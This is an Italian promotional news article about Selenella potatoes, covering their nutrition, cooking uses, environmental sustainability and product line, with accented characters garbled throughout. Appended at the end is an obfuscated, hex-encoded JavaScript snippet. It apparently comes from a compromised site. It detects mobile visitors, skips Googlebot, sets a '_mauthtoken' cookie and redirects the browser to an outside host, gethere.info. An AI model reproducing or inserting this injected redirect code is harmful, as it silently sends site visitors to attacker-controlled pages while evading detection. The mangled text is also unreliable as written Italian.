News

Patata Selenella, un alimento della dieta mediterranea

La patata A? un alimento che risponde perfettamente alle esigenze dello stile di vita contemporaneo, gustoso e nutriente, ma anche sostenibile dal punto di vista ambientale e accessibile a tutta la popolazione. Forte di queste virtA?, la patata s’inserisce cosA� a pieno titolo nella piramide alimentare della Dieta Mediterranea moderna.

L’ALTERNATIVA A PASTA E RISO, CON MENO CALORIE!
Secondo i nutrizionisti la patata rappresenta una valida alternativa ai cereali, perchA� A? fonte di carboidrati complessi e perchA� presenta un profilo nutrizionale simile a quello della pasta o del riso. Infatti, una porzione di patata (200 grammi secondo le Linee Guida per una Sana Alimentazione Italiana) apporta proteine, lipidi, carboidrati e fibre in quantitA� simili a quelle di una porzione (80 grammi) di pasta o di riso, con quasi il 40% di calorie in meno per porzione e con molti piA? micronutrienti di una porzione di questi due cereali. La patata A? ricca di carboidrati complessi, ossia la qualitA� di zuccheri che nell’alimentazione equilibrata dovrebbe essere maggiormente rappresentata. Inoltre, A? fonte di vitamina C, vitamine del gruppo B e di sali minerali come il potassio. Infine, A? utile ricordare che la patata A? un alimento altamente saziante e non contiene glutine: puA? dunque essere consumata in sicurezza da tutta la popolazione.

VERSATILITA’ IN CUCINA
Forte di tante virtA? nutrizionali, la patata non puA? piA? essere considerata semplicemente come un contorno, bensA� come una valida opzione da inserire in una dieta bilanciata e da abbinare a fonti proteiche per un pasto completo di tutti i nutrienti. L’estrema versatilitA� la rende adatta a tutte le cotture anche se, per preservarne al meglio la qualitA� nutrizionale, sono preferibili la cottura al vapore o cotture brevi, per esempio nel microonde. “Ne esistono moltissime qualitA� e colori, ognuna con caratteristiche aromatiche e nutrizionali specifiche e che possono essere usate come ingrediente di infinite preparazioni, come le crocchette, gli sformati, gli gnocchi”, spiega la dott.ssa Ambra Morelli. E la loro versatilitA� in cucina A? evidente anche in cottura: al forno, fritte, bollite, al cartoccio… sono sempre gustose!

PRIMA IN SOSTENIBILITA�
La patata A? una coltura virtuosa in termini di sostenibilitA� ambientale: basso consumo di suolo per calorie prodotte, limitato utilizzo delle risorse idriche, ridotto impatto ambientale in termini di Co2 immessa nell’atmosfera.

A� evidente come la patata sia un tesoro anche a livello economico: ha un prezzo accessibile (una porzione costa circa 20 centesimi), si conserva a lungo e la sua grande versatilitA� in cucina riduce la possibilitA� di spreco a livello domestico. Persino i suoi scarti, ossia le bucce, possono trovare impiego in cucina, nel giardinaggio e per la produzione di energia da biomasse.

selenella-ClassicaPack-786xSELENELLA, UN TESORO ITALIANO
Selenella A? la patata 100% italiana, dall’elevato valore nutritivo e fonte di selenio, un antiossidante naturale che protegge le cellule dallo stress ossidativo e che contribuisce al normale funzionamento del sistema immunitario.

Selenella A? un alimento che risponde alle esigenze dello stile di vita contemporaneo ed A? caratterizzato da importanti peculiaritA� nutrizionali, quali la presenza di vitamina C e del gruppo B, oltre che di sali minerali: il Potassio innanzitutto, utile per il tessuto muscolare e la circolazione sanguigna, e il Selenio, un prezioso antiossidante del quale sono fonte le patate Selenella. Gustose e nutrienti, le patate Selenella sono anche sostenibili, sia da un punto di vista economico, per via del prezzo accessibile, sia dal punto di vista ambientale, in termini di CO2 immessa nell’atmosfera e anche per quanto riguarda il consumo di acqua: il Consorzio Patata Italiana di QualitA�, attua un disciplinare di produzione che prevede il ricorso a tecniche di irrigazione a basso consumo grazie ad impianti ad alta efficienza; inoltre Selenella favorisce l’impiego di concimi organici per tutelare la biodiversitA�.

Di recente la gamma di prodotti Selenella A? stata ampliata per arrivare ad un’offerta completa che garantisca la massima versatilitA�: dalla Selenella Classica alle Mini, dalla Montanara – una patata coltivata in montagna alle Novelle, le primizie sul mercato. Le prerogative di qualitA� di Selenella si possono trovare anche nelle Patatine Fritte Selenella, croccanti e gustose, a ridotto contenuto di sale, e negli Gnocchi Selenella, preparati esclusivamente con patate vere di prima qualitA�.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}